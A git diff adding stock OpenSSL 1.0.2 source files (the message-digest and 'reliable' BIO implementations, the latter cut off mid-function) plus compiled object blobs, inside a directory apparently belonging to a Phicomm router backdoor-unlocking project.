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
RqO$x)%>SRDGJ&k}{{^eJfO!A_

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/bio_md.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/bio_md.c
new file mode 100644
index 0000000..f0b0c0c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/bio_md.c
@@ -0,0 +1,272 @@
+/* crypto/evp/bio_md.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <errno.h>
+#include "cryptlib.h"
+#include <openssl/buffer.h>
+#include <openssl/evp.h>
+
+/*
+ * BIO_put and BIO_get both add to the digest, BIO_gets returns the digest
+ */
+
+static int md_write(BIO *h, char const *buf, int num);
+static int md_read(BIO *h, char *buf, int size);
+/*
+ * static int md_puts(BIO *h, const char *str);
+ */
+static int md_gets(BIO *h, char *str, int size);
+static long md_ctrl(BIO *h, int cmd, long arg1, void *arg2);
+static int md_new(BIO *h);
+static int md_free(BIO *data);
+static long md_callback_ctrl(BIO *h, int cmd, bio_info_cb *fp);
+
+static BIO_METHOD methods_md = {
+    BIO_TYPE_MD, "message digest",
+    md_write,
+    md_read,
+    NULL,                       /* md_puts, */
+    md_gets,
+    md_ctrl,
+    md_new,
+    md_free,
+    md_callback_ctrl,
+};
+
+BIO_METHOD *BIO_f_md(void)
+{
+    return (&methods_md);
+}
+
+static int md_new(BIO *bi)
+{
+    EVP_MD_CTX *ctx;
+
+    ctx = EVP_MD_CTX_create();
+    if (ctx == NULL)
+        return (0);
+
+    bi->init = 0;
+    bi->ptr = (char *)ctx;
+    bi->flags = 0;
+    return (1);
+}
+
+static int md_free(BIO *a)
+{
+    if (a == NULL)
+        return (0);
+    EVP_MD_CTX_destroy(a->ptr);
+    a->ptr = NULL;
+    a->init = 0;
+    a->flags = 0;
+    return (1);
+}
+
+static int md_read(BIO *b, char *out, int outl)
+{
+    int ret = 0;
+    EVP_MD_CTX *ctx;
+
+    if (out == NULL)
+        return (0);
+    ctx = b->ptr;
+
+    if ((ctx == NULL) || (b->next_bio == NULL))
+        return (0);
+
+    ret = BIO_read(b->next_bio, out, outl);
+    if (b->init) {
+        if (ret > 0) {
+            if (EVP_DigestUpdate(ctx, (unsigned char *)out,
+                                 (unsigned int)ret) <= 0)
+                return (-1);
+        }
+    }
+    BIO_clear_retry_flags(b);
+    BIO_copy_next_retry(b);
+    return (ret);
+}
+
+static int md_write(BIO *b, const char *in, int inl)
+{
+    int ret = 0;
+    EVP_MD_CTX *ctx;
+
+    if ((in == NULL) || (inl <= 0))
+        return (0);
+    ctx = b->ptr;
+
+    if ((ctx != NULL) && (b->next_bio != NULL))
+        ret = BIO_write(b->next_bio, in, inl);
+    if (b->init) {
+        if (ret > 0) {
+            if (!EVP_DigestUpdate(ctx, (const unsigned char *)in,
+                                  (unsigned int)ret)) {
+                BIO_clear_retry_flags(b);
+                return 0;
+            }
+        }
+    }
+    if (b->next_bio != NULL) {
+        BIO_clear_retry_flags(b);
+        BIO_copy_next_retry(b);
+    }
+    return (ret);
+}
+
+static long md_ctrl(BIO *b, int cmd, long num, void *ptr)
+{
+    EVP_MD_CTX *ctx, *dctx, **pctx;
+    const EVP_MD **ppmd;
+    EVP_MD *md;
+    long ret = 1;
+    BIO *dbio;
+
+    ctx = b->ptr;
+
+    switch (cmd) {
+    case BIO_CTRL_RESET:
+        if (b->init)
+            ret = EVP_DigestInit_ex(ctx, ctx->digest, NULL);
+        else
+            ret = 0;
+        if (ret > 0)
+            ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        break;
+    case BIO_C_GET_MD:
+        if (b->init) {
+            ppmd = ptr;
+            *ppmd = ctx->digest;
+        } else
+            ret = 0;
+        break;
+    case BIO_C_GET_MD_CTX:
+        pctx = ptr;
+        *pctx = ctx;
+        b->init = 1;
+        break;
+    case BIO_C_SET_MD_CTX:
+        if (b->init)
+            b->ptr = ptr;
+        else
+            ret = 0;
+        break;
+    case BIO_C_DO_STATE_MACHINE:
+        BIO_clear_retry_flags(b);
+        ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        BIO_copy_next_retry(b);
+        break;
+
+    case BIO_C_SET_MD:
+        md = ptr;
+        ret = EVP_DigestInit_ex(ctx, md, NULL);
+        if (ret > 0)
+            b->init = 1;
+        break;
+    case BIO_CTRL_DUP:
+        dbio = ptr;
+        dctx = dbio->ptr;
+        if (!EVP_MD_CTX_copy_ex(dctx, ctx))
+            return 0;
+        b->init = 1;
+        break;
+    default:
+        ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        break;
+    }
+    return (ret);
+}
+
+static long md_callback_ctrl(BIO *b, int cmd, bio_info_cb *fp)
+{
+    long ret = 1;
+
+    if (b->next_bio == NULL)
+        return (0);
+    switch (cmd) {
+    default:
+        ret = BIO_callback_ctrl(b->next_bio, cmd, fp);
+        break;
+    }
+    return (ret);
+}
+
+static int md_gets(BIO *bp, char *buf, int size)
+{
+    EVP_MD_CTX *ctx;
+    unsigned int ret;
+
+    ctx = bp->ptr;
+    if (size < ctx->digest->md_size)
+        return (0);
+    if (EVP_DigestFinal_ex(ctx, (unsigned char *)buf, &ret) <= 0)
+        return -1;
+
+    return ((int)ret);
+}
+
+/*-
+static int md_puts(bp,str)
+BIO *bp;
+char *str;
+        {
+        return(-1);
+        }
+*/
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/bio_md.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/bio_md.o
new file mode 100644
index 0000000000000000000000000000000000000000..83b507404db06f2bbeec09540a524a06e527bbd7
GIT binary patch
literal 4608
zcmbuCZ){Ul6u@uS!3NB>f=FQl8$~lvYRd==61A^uw>Rk+%7!L5ny!8O6S{V`Z?c(e
z3+cM}QXptd<O3hjFMc(CGSQGGBbg>d3DGYmMxuPMj0nbmiOT9Z_uaEz9<4FqB)9k6
z-@WJDbI-l+zSr4sq_fUuV<a~AJgc;bLhY#N0j>s^i#ge^&TW6Gh1qsBU)EQZu)|+m
zKzKwo{{9KuVSiE07j^eyhZ~#9C+J=^I(&;A9t0tyc#K;p{r#$OSIymWgF|0#IqjVL
z9{RhDZ)RI^%T3O?C1~ZAHRs%EuGsXJ(r;Xw)CW#2zYD59np+;%gQf2fPrKPfgTGk%
z5gKY?pZ}U_M7B5bnAGzSlJo2ryl1*yEkH-axOoXfD}5-8^#!%ipc=NNwW_gyG3>@p
z9(?I-8u7kr^!S!;UUC9ZjoZ=$1<9)hz2>wyBt$V3KwIj@u)eGWHPbF;T6#88P<*Pf
z95EJoHw2u2qg*bRcEFDc{vlvBciBCl4Dh@Qou`tLm{1G#Pqy;lU^3W<f^+{%jkBB8
zGkx3ZxmU#~<~}cn^TnBZh^L-sBB8c5aVve585qoB?$A-CFYLe35AI!R{tx|Fq;L{K
zyxRkMFP(x;)zHNfaSIgVvc4t{GXtF61WDq_GW{C2dA+njjbDuzfAU7YIQy-VyHbYb
zxI)JD0p&I2xVa`cVLS0u;ps5#7dw2gHgi+N@e+sX*n&8Q3WU58??nFE%<Cd%SO<pP
zOkuCDgw11xxG{YFiE#eL%(m|M*OdS#oV4L)_}kRnbUV|xR9~DOX1aedXI5e43u9U~
z8ynU<iP2##t0S^VW1R&&XtS%M<AA5Ne{dqDPk8ow+q}MA{(Td?>7Uu{^ZNGeFtIsN
zJyb3z7;e|0eg@$bk=dc3JYrVN_U6mXHtDi8H#Ib#gC_-TT14MQQRDN^Hw^0C$ifa+
zt}f|l1a%LT2r`g^_@s3@TxaSOhkM@M<?z{e+15JTio+FjG=|rONQGfI{~Q#QSMW!5
zc<K&08lM660=7Y>@dx~!tqVHbr|lt!XTCn<@YN+89&i=pUNN>SI1Xel{=A5>jW`;W
z1%|%(PDA}3_Emf-<m;5=3)jwX3#glL{C@~8wVwS_t~SJ8{U(OoQ}*w*vV$k9tOZaf
z`JugN7M$9AKY%?hco)<td@rEh2?hPUg8_r^Ttkg^$V-CrTmw5G_>efiJg2~df?p7v
z=M&gLC^ohleoZ+{3e<Lf`XnG!yEI<zwX-#Hb49l^%*Op<XY1~VK<o@p=Dl(hnz+AK
zNdl<GXKL_sHTVZL_{TN)r#1LjHTVxT`0q9NYS`Cm>vGoMo*KNZ27eCtdf53kaimwC
zm%-6=bS&YGv#~@p9!n+%WAPKwxSmNONNFcI7tLW!&tf~H#S&N#Wi$=zlbKN+6ipvV
zC$iv;MY|%sK_wFH?d&`f?u+&*!ALmDg5ABADZ)n&M|(oij=oo;ac~Mwkc9Xp-JKfM
zquQitmDFOH=uk2?oHg4R5O<dzpMoeSb%;sNOmTB^h+SY`@z^<<iX{<6qgkCVbL2#H
zC^l-k;)|*b?jKK3Ji=iD-W-|q6ra~zF-9<i>t$>k6coG}@LB%{J|0l;JfR?e6bkVT
zupcPMH$fr3L*jT>65lKF%@XgDxa@yO;#;KgpGh3=Ch~t>;`lxxzFFKK80S`rw@X}(
zKOk{A&K`+luE_tS#2=IRRf&5f{<FkoKV^x_@oW_5-J0jE5|`sVAUL|iPjQNqKFiS$
zz6*)ZOL>#`i*7XReh3N)J>$r64!WPw7KJ$7^Q|Uc;q+ecSvb8%+AW;kI{^!)_l0WV
zqRBi$!5BqqIl=D-6yoInu!&bV#q*YhQ~Vb#oYs5Q!YR&M7EXC<!GwWOJaoS?Z+2=-
zj}1btXUuwpw2YRFd3Crnm=~V$81oKhv&@@GV*`i#y?$uoAWlH@Cev^?GH*ORHm0S(
zE|u0bFMOx%;unc%52q%)<C*lhmeHq#18oE@$=DeFGkGxafH^L;^5!=E1<Z=QAkM95
z^0B02jn6us-2fC>u8UW=OKdWpRh);;FP+P$1h-7XX01Rt7uzCQjDOpqPwVjiYws8H
z)AtiOCVTv6C=1O`br?EPx6Xf206M?q!$XRw15j7X-yQKuQxxMcf4E21{PhFF`RTa@
zmCGG5|I-9SO>t9w960In&}Iy(ide^{U`zuPvCS(M9%1iUA*Mp{6P^bJeOm1U!oJlq
zq1FBr*jCHmN8&@I2>mFSKTIjv)A_45H;y0S|L-8LB9C}aZ>VCA$K1O2fY^C4QKuz-
UOOriZ!+u;`?&r{%Bv$)>0an@Oi2wiq

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/bio_ok.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/bio_ok.c
new file mode 100644
index 0000000..a455034
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/bio_ok.c
@@ -0,0 +1,623 @@
+/* crypto/evp/bio_ok.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/*-
+        From: Arne Ansper <arne@cyber.ee>
+
+        Why BIO_f_reliable?
+
+        I wrote function which took BIO* as argument, read data from it
+        and processed it. Then I wanted to store the input file in
+        encrypted form. OK I pushed BIO_f_cipher to the BIO stack
+        and everything was OK. BUT if user types wrong password
+        BIO_f_cipher outputs only garbage and my function crashes. Yes
+        I can and I should fix my function, but BIO_f_cipher is
+        easy way to add encryption support to many existing applications
+        and it's hard to debug and fix them all.
+
+        So I wanted another BIO which would catch the incorrect passwords and
+        file damages which cause garbage on BIO_f_cipher's output.
+
+        The easy way is to push the BIO_f_md and save the checksum at
+        the end of the file. However there are several problems with this
+        approach:
+
+        1) you must somehow separate checksum from actual data.
+        2) you need lot's of memory when reading the file, because you
+        must read to the end of the file and verify the checksum before
+        letting the application to read the data.
+
+        BIO_f_reliable tries to solve both problems, so that you can
+        read and write arbitrary long streams using only fixed amount
+        of memory.
+
+        BIO_f_reliable splits data stream into blocks. Each block is prefixed
+        with it's length and suffixed with it's digest. So you need only
+        several Kbytes of memory to buffer single block before verifying
+        it's digest.
+
+        BIO_f_reliable goes further and adds several important capabilities:
+
+        1) the digest of the block is computed over the whole stream
+        -- so nobody can rearrange the blocks or remove or replace them.
+
+        2) to detect invalid passwords right at the start BIO_f_reliable
+        adds special prefix to the stream. In order to avoid known plain-text
+        attacks this prefix is generated as follows:
+
+                *) digest is initialized with random seed instead of
+                standardized one.
+                *) same seed is written to output
+                *) well-known text is then hashed and the output
+                of the digest is also written to output.
+
+        reader can now read the seed from stream, hash the same string
+        and then compare the digest output.
+
+        Bad things: BIO_f_reliable knows what's going on in EVP_Digest. I
+        initially wrote and tested this code on x86 machine and wrote the
+        digests out in machine-dependent order :( There are people using
+        this code and I cannot change this easily without making existing
+        data files unreadable.
+
+*/
+
+#include <stdio.h>
+#include <errno.h>
+#include <assert.h>
+#include "cryptlib.h"
+#include <openssl/buffer.h>
+#include <openssl/bio.h>
+#include <openssl/evp.h>
+#include <openssl/rand.h>
+
+static int ok_write(BIO *h, const char *buf, int num);
+static int ok_read(BIO *h, char *buf, int size);
+static long ok_ctrl(BIO *h, int cmd, long arg1, void *arg2);
+static int ok_new(BIO *h);
+static int ok_free(BIO *data);
+static long ok_callback_ctrl(BIO *h, int cmd, bio_info_cb *fp);
+
+static int sig_out(BIO *b);
+static int sig_in(BIO *b);
+static int block_out(BIO *b);
+static int block_in(BIO *b);
+#define OK_BLOCK_SIZE   (1024*4)
+#define OK_BLOCK_BLOCK  4
+#define IOBS            (OK_BLOCK_SIZE+ OK_BLOCK_BLOCK+ 3*EVP_MAX_MD_SIZE)
+#define WELLKNOWN "The quick brown fox jumped over the lazy dog's back."
+
+typedef struct ok_struct {
+    size_t buf_len;
+    size_t buf_off;
+    size_t buf_len_save;
+    size_t buf_off_save;
+    int cont;                   /* <= 0 when finished */
+    int finished;
+    EVP_MD_CTX md;
+    int blockout;               /* output block is ready */
+    int sigio;                  /* must process signature */
+    unsigned char buf[IOBS];
+} BIO_OK_CTX;
+
+static BIO_METHOD methods_ok = {
+    BIO_TYPE_CIPHER, "reliable",
+    ok_write,
+    ok_read,
+    NULL,                       /* ok_puts, */
+    NULL,                       /* ok_gets, */
+    ok_ctrl,
+    ok_new,
+    ok_free,
+    ok_callback_ctrl,
+};
+
+BIO_METHOD *BIO_f_reliable(void)
+{
+    return (&methods_ok);
+}
+
+static int ok_new(BIO *bi)
+{
+    BIO_OK_CTX *ctx;
+
+    ctx = (BIO_OK_CTX *)OPENSSL_malloc(sizeof(BIO_OK_CTX));
+    if (ctx == NULL)
+        return (0);
+
+    ctx->buf_len = 0;
+    ctx->buf_off = 0;
+    ctx->buf_len_save = 0;
+    ctx->buf_off_save = 0;
+    ctx->cont = 1;
+    ctx->finished = 0;
+    ctx->blockout = 0;
+    ctx->sigio = 1;
+
+    EVP_MD_CTX_init(&ctx->md);
+
+    bi->init = 0;
+    bi->ptr = (char *)ctx;
+    bi->flags = 0;
+    return (1);
+}
+
+static int ok_free(BIO *a)
+{
+    if (a == NULL)
+        return (0);
+    EVP_MD_CTX_cleanup(&((BIO_OK_CTX *)a->ptr)->md);
+    OPENSSL_cleanse(a->ptr, sizeof(BIO_OK_CTX));
+    OPENSSL_free(a->ptr);
+    a->ptr = NULL;
+    a->init = 0;
+    a->flags = 0;
+    return (1);
+}
+
+static int ok_read(BIO *b, char *out, int outl)
+{
+    int ret = 0, i, n;
+    BIO_OK_CTX *ctx;
+
+    if (out == NULL)
+        return (0);
+    ctx = (BIO_OK_CTX *)b->ptr;
+
+    if ((ctx == NULL) || (b->next_bio == NULL) || (b->init == 0))
+        return (0);
+
+    while (outl > 0) {
+
+        /* copy clean bytes to output buffer */
+        if (ctx->blockout) {
+            i = ctx->buf_len - ctx->buf_off;
+            if (i > outl)
+                i = outl;
+            memcpy(out, &(ctx->buf[ctx->buf_off]), i);
+            ret += i;
+            out += i;
+            outl -= i;
+            ctx->buf_off += i;
+
+            /* all clean bytes are out */
+            if (ctx->buf_len == ctx->buf_off) {
+                ctx->buf_off = 0;
+
+                /*
+                 * copy start of the next block into proper place
+                 */
+                if (ctx->buf_len_save - ctx->buf_off_save > 0) {
+                    ctx->buf_len = ctx->buf_len_save - ctx->buf_off_save;
+                    memmove(ctx->buf, &(ctx->buf[ctx->buf_off_save]),
+                            ctx->buf_len);
+                } else {
+                    ctx->buf_len = 0;
+                }
+                ctx->blockout = 0;
+            }
+        }
+
+        /* output buffer full -- cancel */
+        if (outl == 0)
+            break;
+
+        /* no clean bytes in buffer -- fill it */
+        n = IOBS - ctx->buf_len;
+        i = BIO_read(b->next_bio, &(ctx->buf[ctx->buf_len]), n);
+
+        if (i <= 0)
+            break;              /* nothing new */
+
+        ctx->buf_len += i;
+
+        /* no signature yet -- check if we got one */
+        if (ctx->sigio == 1) {
+            if (!sig_in(b)) {
+                BIO_clear_retry_flags(b);
+                return 0;
+            }
+        }
+
+        /* signature ok -- check if we got block */
+        if (ctx->sigio == 0) {
+            if (!block_in(b)) {
+                BIO_clear_retry_flags(b);
+                return 0;
+            }
+        }
+
+        /* invalid block -- cancel */
+        if (ctx->cont <= 0)
+            break;
+
+    }
+
+    BIO_clear_retry_flags(b);
+    BIO_copy_next_retry(b);
+    return (ret);
+}
+
+static int ok_write(BIO *b, const char *in, int inl)
+{
+    int ret = 0, n, i;
+    BIO_OK_CTX *ctx;
+
+    if (inl <= 0)
+        return inl;
+
+    ctx = (BIO_OK_CTX *)b->ptr;
+    ret = inl;
+
+    if ((ctx == NULL) || (b->next_bio == NULL) || (b->init == 0))
+        return (0);
+
+    if (ctx->sigio && !sig_out(b))
+        return 0;
+
+    do {
+        BIO_clear_retry_flags(b);
+        n = ctx->buf_len - ctx->buf_off;
+        while (ctx->blockout && n > 0) {
+            i = BIO_write(b->next_bio, &(ctx->buf[ctx->buf_off]), n);
+            if (i <= 0) {
+                BIO_copy_next_retry(b);
+                if (!BIO_should_retry(b))
+                    ctx->cont = 0;
+                return (i);
+            }
+            ctx->buf_off += i;
+            n -= i;
+        }
+
+        /* at this point all pending data has been written */
+        ctx->blockout = 0;
+        if (ctx->buf_len == ctx->buf_off) {
+            ctx->buf_len = OK_BLOCK_BLOCK;
+            ctx->buf_off = 0;
+        }
+
+        if ((in == NULL) || (inl <= 0))
+            return (0);
+
+        n = (inl + ctx->buf_len > OK_BLOCK_SIZE + OK_BLOCK_BLOCK) ?
+            (int)(OK_BLOCK_SIZE + OK_BLOCK_BLOCK - ctx->buf_len) : inl;
+
+        memcpy((unsigned char *)(&(ctx->buf[ctx->buf_len])),
+               (unsigned char *)in, n);
+        ctx->buf_len += n;
+        inl -= n;
+        in += n;
+
+        if (ctx->buf_len >= OK_BLOCK_SIZE + OK_BLOCK_BLOCK) {
+            if (!block_out(b)) {
+                BIO_clear_retry_flags(b);
+                return 0;
+            }
+        }
+    } while (inl > 0);
+
+    BIO_clear_retry_flags(b);
+    BIO_copy_next_retry(b);
+    return (ret);
+}
+
+static long ok_ctrl(BIO *b, int cmd, long num, void *ptr)
+{
+    BIO_OK_CTX *ctx;
